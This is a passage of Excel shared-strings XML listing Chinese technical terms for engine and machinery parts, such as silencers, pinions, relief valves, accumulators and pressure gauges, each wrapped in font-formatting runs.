        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销规总成布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销钳子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小齿轮驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小齿轮总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校正环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校正检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校正图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校中调整所需空间</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校准螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>校准器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>楔块圆盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>楔形垫片</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管，废物盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管，活塞冷却</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卸扣</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卸压</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卸压阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卸压阀箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卸压阀支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卸油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卸油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号发生器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号规格单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信息号要求</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FACE,WELD-ON GALL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>BRACKET</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修理</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保养工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修正性能参数</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>虚拟手柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>序列表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>序列表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>序言</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄能器测试设备</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器测试设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器壳体布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器与分配块质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器组装配和测试生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>悬挂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力转换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>悬铁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转和位置传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转整流器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转直角接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>循环系统用过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>循环油和系统油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>循环油维护</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压差表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压差计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压盖凸缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力变换器的装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表防护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表管路</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表管路布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表及温度仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表接口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表联轴器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表面板支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表用螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表用软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机功率</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试法兰</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力测试说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力传感器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力传感器调试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力发信器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力罐</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力计管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力计和温度计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力监测管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力监控单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力均衡管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力开关</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压动作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力开关</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压动作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力开关布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力控制单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力控制管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力控制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力控制调整和测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
